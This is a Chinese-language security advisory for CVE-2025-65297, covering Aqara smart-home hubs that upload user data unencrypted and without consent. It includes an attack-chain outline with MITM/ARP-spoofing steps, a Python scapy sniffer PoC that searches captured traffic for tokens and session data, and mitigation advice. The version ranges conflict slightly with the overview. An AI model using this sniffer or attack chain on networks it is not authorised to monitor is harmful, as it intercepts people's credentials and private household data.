CVE-2025-65297: Aqara Hub设备未授权收集上传敏感信息漏洞

漏洞信息

漏洞编号

CVE-2025-65297

漏洞类型

未授权数据收集/隐私泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Aqara Camera Hub G3, Aqara Hub M2, Aqara Hub M3

漏洞概述

CVE-2025-65297是绿米联创（Aqara）智能家居Hub设备中存在的严重隐私安全漏洞。该漏洞影响Camera Hub G3（固件版本4.1.9_0027）、Hub M2（固件版本4.3.6_0027）以及Hub M3（固件版本4.3.6_0025）等多款主流智能家居网关产品。漏洞源于这些设备在用户不知情且未经制造商披露或同意的情况下，自动收集并上传用户敏感信息到远程服务器，且传输过程未采用任何加密保护措施。由于Aqara Hub设备通常作为智能家居生态系统的核心控制中枢，能够访问和控制家中的各种智能设备、传感器以及摄像头等设备，因此其收集的信息可能包含用户生活习惯、作息时间、室内活动轨迹、家庭成员信息等高度敏感的隐私数据。这种未经授权的数据收集行为不仅侵犯了用户隐私权，还可能为攻击者提供有价值的情报，用于后续针对性攻击或非法用途。漏洞的CVSS评分为7.5，属于高危级别，攻击向量为网络层面，无需认证和用户交互即可利用，对机密性造成严重影响。

技术细节

该漏洞属于设计层面的隐私合规问题，源于Aqara Hub设备内置的数据收集模块存在过度收集和不当传输行为。从技术角度分析，受影响的Hub设备在正常运行过程中会通过内置的遥测或诊断功能自动捕获设备状态信息、用户交互数据以及通过网络连接将数据发送至厂商服务器。问题核心在于：首先，数据收集行为未向用户明确告知或获取同意；其次，传输通道未使用TLS等加密协议，导致数据在网络传输过程中以明文形式存在，面临中间人攻击（MITM）的风险。攻击者只需处于与Hub设备同一网络环境或能够拦截网络流量，即可被动监听或主动嗅探敏感数据的传输内容。由于设备固件中硬编码了数据上传的目标地址和传输协议，攻击者还可通过DNS劫持或ARP欺骗将数据传输重定向至恶意服务器，进一步扩大数据泄露范围。此外，设备缺乏数据上传的完整性校验机制，无法验证接收服务器的合法性，为供应链层面的数据窃取提供了可能。

攻击链分析

STEP 1

步骤1: 网络侦察

攻击者通过网络扫描发现内网中的Aqara Hub设备，获取其IP地址和MAC地址，确认设备型号和固件版本信息

STEP 2

步骤2: 流量嗅探

攻击者部署网络抓包工具（如Wireshark tcpdump）或进行中间人攻击，监听Aqara Hub设备的所有出站网络流量

STEP 3

步骤3: 数据捕获

由于数据传输未加密，攻击者直接获取明文敏感信息，包括设备标识、用户行为数据、家庭环境信息等

STEP 4

步骤4: 数据分析利用

攻击者对捕获的数据进行解码和分析，提取有价值的情报，可能用于身份盗窃、入侵其他系统或出售给第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-65297 PoC - Aqara Hub Data Interception
# This PoC demonstrates passive network monitoring to capture unencrypted data uploads

import scapy.all as scapy
from collections import defaultdict
import json
import sys

def analyze_packet(packet):
    """Analyze packets for unencrypted Aqara Hub data transmissions"""
    if packet.haslayer(scapy.TCP) and packet.haslayer(scapy.Raw):
        try:
            payload = packet[scapy.Raw].load.decode('utf-8', errors='ignore')
            # Look for Aqara-specific data patterns
            if any(keyword in payload.lower() for keyword in ['aqara', 'hub', 'device', 'token', 'session']):
                print(f"[+] Potential Aqara data captured from {packet[scapy.IP].src}")
                print(f"    Payload length: {len(payload)} bytes")
                print(f"    Payload preview: {payload[:200]}...")
                
                # Check for plaintext transmission (no TLS indicators)
                if not packet.haslayer(scapy.TLS) and not packet.haslayer(scapy.TLSClientHello):
                    print(f"    [!] WARNING: Data transmitted WITHOUT encryption!")
                    return {
                        'source_ip': packet[scapy.IP].src,
                        'dest_ip': packet[scapy.IP].dst,
                        'port': packet[scapy.TCP].dport,
                        'data': payload,
                        'encrypted': False
                    }
        except Exception as e:
            pass
    return None

def start_sniffing(interface='eth0', count=100):
    """Start packet capture on specified interface"""
    print(f"[*] Starting packet capture on {interface}")
    print("[*] Looking for unencrypted Aqara Hub communications...")
    print("[*] Press Ctrl+C to stop\n")
    
    captured_data = []
    
    try:
        packets = scapy.sniff(iface=interface, count=count, prn=analyze_packet, store=False)
    except KeyboardInterrupt:
        print("\n[*] Stopping capture...")
    
    return captured_data

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65297 - Aqara Hub Unencrypted Data Upload PoC")
    print("=" * 60)
    
    interface = sys.argv[1] if len(sys.argv) > 1 else 'eth0'
    start_sniffing(interface=interface)
    
    print("\n[*] Mitigation: Block unencrypted outbound connections from IoT devices")

影响范围

Aqara Camera Hub G3 < 4.1.9_0027

Aqara Hub M2 < 4.3.6_0027

Aqara Hub M3 < 4.3.6_0025

防御指南

临时缓解措施

在官方修复补丁发布之前，建议用户采取以下临时缓解措施：首先，立即将受影响的Aqara Hub设备放置在独立的网络隔离区（VLAN）中，限制其与敏感网络的通信；其次，在路由器或防火墙上配置访问控制列表（ACL），阻止IoT设备向非预期目标IP建立连接；第三，监控家庭网络流量，关注异常的出站连接行为；第四，考虑暂时禁用设备的云端同步功能；最后，建议用户定期检查厂商公告，等待官方发布安全更新后立即升级固件。